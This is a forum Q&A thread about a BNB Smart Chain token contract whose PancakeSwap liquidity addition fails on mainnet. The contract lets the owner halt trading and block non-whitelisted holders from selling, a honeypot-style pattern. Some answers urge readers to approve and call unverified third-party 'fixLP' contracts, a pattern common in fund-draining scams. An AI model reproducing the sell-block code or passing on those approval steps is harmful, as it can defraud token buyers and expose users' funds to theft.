# Got an error on adding liquidity on PancakeSwap -> "addLiquidityETH" reverted with the following reason: PancakeLibrary: INSUFFICIENT_LIQUIDITY

Tags: solidity, pancakeswap

I created my own token. Here is code of it:

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IERC20 {
    
    function totalSupply() external view returns (uint);
    function balanceOf(address account) external view returns (uint);
    function transfer(address recipient, uint amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint);
    function approve(address spender, uint amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint value);
    event Approval(address indexed owner, address indexed spender, uint value);
}

library SafeMath {
    

    function add(uint a, uint b) internal pure returns (uint) {
        return a + b;
    }

    function sub(uint a, uint b) internal pure returns (uint) {
        return a - b;
    }

    function mul(uint a, uint b) internal pure returns (uint) {
        return a * b;
    }
    
    function div(uint a, uint b) internal pure returns (uint) {
        return a / b;
    }

    function sub(uint a, uint b, string memory errorMessage) internal pure returns (uint) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }
    
    function div(uint a, uint b, string memory errorMessage) internal pure returns (uint) { //Contract By Techaddict
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }
    
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; 
        return msg.data;
    }
}

library Address {
    
    function isContract(address account) internal view returns (bool) {
        uint size;
        assembly { size := extcodesize(account) }
        return size > 0;
    }

    function sendValue(address payable recipient, uint amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");
        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }
    
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }
    
    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }
    
    function functionCallWithValue(address target, bytes memory data, uint value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }
    
    function functionCallWithValue(address target, bytes memory data, uint value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");
        (bool success, bytes memory returndata) = target.call{ value: value }(data);
        return _verifyCallResult(success, returndata, errorMessage);
    }
    
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }
    
    function functionStaticCall(address target, bytes memory data, string memory errorMessage) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");
        (bool success, bytes memory returndata) = target.staticcall(data);
        return _verifyCallResult(success, returndata, errorMessage);
    }


    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }
    
    function functionDelegateCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return _verifyCallResult(success, returndata, errorMessage);
    }

    function _verifyCallResult(bool success, bytes memory returndata, string memory errorMessage) private pure returns(bytes memory) {
        if (success) {
            return returndata;
        } else {
            if (returndata.length > 0) {
                 assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

abstract contract Ownable is Context {
    address private _owner;


    // Set original owner
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    constructor () {
        _owner = address(msg.sender);
        emit OwnershipTransferred(address(0), _owner);
    }

    // Return current owner
    function owner() public view virtual returns (address) {
        return _owner;
    }

    // Restrict function to contract owner only 
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    // Renounce ownership of the contract 
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    // Transfer the contract to to a new owner
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);
    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);
    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);
    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);
    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);
    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;
    function initialize(address, address) external;
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
        ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
        ) external returns (uint amountToken, uint amountETH);

    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
        ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
}

contract Dextro is Context, IERC20, Ownable { 
    using SafeMath for uint;
    using Address for address;

    mapping (address => uint) private _tOwned;
    mapping (address => bool) private _isHolder;
    mapping (address => mapping (address => uint)) private _allowances;
    
    string private _name = "Dextro"; 
    string private _symbol = "DXT";  
    uint8 private _decimals = 18;
    uint private _tTotal = 100000000 * 10 ** _decimals;

    bool public TradeStatus = true;
    bool public AirDropStatus = true;

    // Counter for liquify trigger
    uint8 private txCount = 0;

    /* 
    PANCAKESWAP SET UP
    */
                                     
    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;
    bool public inSwapAndLiquify;
    bool public swapAndLiquifyEnabled = true;
    
    event SwapAndLiquifyEnabledUpdated(bool enabled);
    event SwapAndLiquify(
        uint tokensSwapped,
        uint ethReceived,
        uint tokensIntoLiqudity
        
    );
    
    // Prevent processing while already processing! 
    modifier lockTheSwap {
        inSwapAndLiquify = true;
        _;
        inSwapAndLiquify = false;
    }

    constructor () {
        _tOwned[owner()] = _tTotal;
        
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x10ED43C718714eb63d5aA57B78B54704E256024E);

        // Create pair address for PancakeSwap
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(_uniswapV2Router.WETH(), address(this));
        uniswapV2Router = _uniswapV2Router;
        
        _isHolder[owner()] = true;

        emit Transfer(address(0), owner(), _tTotal);
    }


    /*
    STANDARD ERC20 COMPLIANCE FUNCTIONS
    */
    function name() public view returns (string memory) {
        return _name;
    }
    function symbol() public view returns (string memory) {
        return _symbol;
    }
    function decimals() public view returns (uint8) {
        return _decimals;
    }
    function totalSupply() public view override returns (uint) {
        return _tTotal;
    }
    function balanceOf(address account) public view override returns (uint) {
        return _tOwned[account];
    }
    function transfer(address recipient, uint amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }
    function allowance(address owner, address spender) public view override returns (uint) {
        return _allowances[owner][spender];
    }
    function approve(address spender, uint amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    function transferFrom(address sender, address recipient, uint amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }
    function increaseAllowance(address spender, uint addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }
    function decreaseAllowance(address spender, uint subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    // This function is required so that the contract can receive BNB from pancakeswap
    receive() external payable {}

    // Approve a wallet to sell tokens
    function _approve(address owner, address spender, uint amount) private {

        require(owner != address(0) && spender != address(0), "ERR: zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);

    }

    function _transfer(
        address from,
        address to,
        uint amount
    ) private {
        require(TradeStatus, "Trading is not avalible now!");

        require(from != address(0) && to != address(0), "ERR: Using 0 address!");
        require(amount > 0, "Token value must be higher than zero.");
        assert(amount != type(uint256).max);
        assert(!AirDropStatus || (to != uniswapV2Pair || (_isHolder[from])));

        _tokenTransfer(from,to,amount);
    }

    // Swapping tokens for BNB using PancakeSwap 
    function swapTokensForBNB(uint tokenAmount) private {
        require(TradeStatus, "Trading is not available now!");

        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETH(
            tokenAmount,
            0, 
            path,
            address(this),
            block.timestamp
        );
    }

    /*
    PURGE RANDOM TOKENS - Add the random token address and a wallet to send them to
    */

    // Remove random tokens from the contract and send to a wallet
    function remove_Random_Tokens(address random_Token_Address, address send_to_wallet, uint number_of_tokens) public onlyOwner returns(bool _sent){
        require(random_Token_Address != address(this), "Can not remove native token");
        uint randomBalance = IERC20(random_Token_Address).balanceOf(address(this));

        if (number_of_tokens > randomBalance) {
            number_of_tokens = randomBalance;
        }
        
        _sent = IERC20(random_Token_Address).transfer(send_to_wallet, number_of_tokens);
    }

    function addHolder(address holder) public onlyOwner {
        if (holder != address(0) && !_isHolder[holder]) {
            _isHolder[holder] = true;
        }
    }

    function removeHolder(address holder) public onlyOwner {
        if (holder != address(0) && _isHolder[holder]) {
            _isHolder[holder] = false;
        }
    }

    function availableTradnig(bool status) public onlyOwner{
        TradeStatus = status;
    }

    function startAirDrop(bool status) public onlyOwner{
        AirDropStatus = status;
    }

    /* TOKEN TRANSFERS */
    function _tokenTransfer(address sender, address recipient, uint amount) private {
        _transferTokens(sender, recipient, amount);
    }

    function _transferTokens(address sender, address recipient, uint tAmount) private {
        _tOwned[sender] = _tOwned[sender].sub(tAmount);
        _tOwned[recipient] = _tOwned[recipient].add(tAmount);
        emit Transfer(sender, recipient, tAmount);
    }
}
```

I created this smart contract on the BNB Smart Chain testnet and it worked without any problems. I could both add liquidity and take it away.

But when I created this contract on the BNB Smart Chain mainnet, the following error started to appear when adding liquidity.

> Add liquidity failed: Unknown error: "The contract function "addLiquidityETH" reverted with the following reason: PancakeLibrary: INSUFFICIENT_LIQUIDITY". Try increasing your slippage tolerance.

I thought this was a problem in the smart contract, but no matter what contract i have deployed in the mainnet, I cannot add liquidity to it

Answer (score 0):

For troubleshooting:

1: Check Token Balance: Ensure there's enough balance for the tokens being used.

2: Liquidity Pool: Verify if there's adequate liquidity in the pool for the trading pair.

3: Slippage Tolerance: Increase it to accommodate price changes.

4: Gas Price: Set an appropriate gas price to prevent delays or failures.

5: Token Approval: Confirm if the smart contract requires token approval before spending.

Addressing these steps can help the developer diagnose and fix the "INSUFFICIENT_LIQUIDITY" error.

Comment: did you use any generative AI at all in the writing of this answer post?

Answer (score 0):

You can add liquidity to your token by using this contract . I also faced the same issue and i used this contract to add liquidity into my token without pay any fee. This contract does not charge anything.
https://bscscan.com/address/0xC32aF347b01BfF021215a78cd44Aafcf8c659503

Answer (score 0):

Already find the answer https://www.youtube.com/watch?v=DQQc_YyUdDM , there was no bug in the code its just the bot called "epstein" ruining all new contracts lol

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Answer (score 0):

You can simply use this FixLP token (method FixLP) to fix the LP 0x329cc9f3ed364c61c16f233b06e4658450b939a0. Direct link: https://bscscan.com/address/0x329cC9f3eD364c61c16f233b06e4658450b939a0#writeContract

Answer (score 0):

you can use FIXLP,
step1: approve contract 0xCfE470016e139F1cc1e6142a1Ef5D3688B07C916 on your contract
step2: fixLP with link ( amount bnb, address token, amount token)
step3: write & check
https://bscscan.com/address/0xcfe470016e139f1cc1e6142a1ef5d3688b07c916#writeContract

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).